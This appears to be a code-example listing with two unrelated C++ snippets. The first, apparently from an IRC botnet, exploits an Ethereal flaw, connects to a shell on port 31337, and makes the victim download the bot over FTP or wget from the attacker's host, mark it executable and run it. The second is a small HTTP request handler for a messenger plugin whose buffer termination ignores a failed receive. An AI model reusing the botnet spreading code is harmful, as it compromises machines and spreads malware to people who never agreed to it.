Example #1
0
bool CScannerEthereal::Exploit() {
	if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;

	// We need root to exploit this cause we need to spoof packets
	if(getuid()) return false;

	ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
	
	CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
		CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
		sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sShellSocket.Disconnect(); return true; } else return false; }
Example #2
0
	void ProcessConnection()
	{
		char buf[1024];
		int n = m_socket->Recv(buf, sizeof(buf));
		buf[n] = 0;

		char *s = FetchURL(buf);

		if (!strncmp(s, "/fav/list/", 10))
		{
			SendList();
		} else
		if (!strncmp(s, "/fav/open/", 10))
		{
			OpenContact(s);
		}

		mir_free(s);
		m_socket->Close();
	}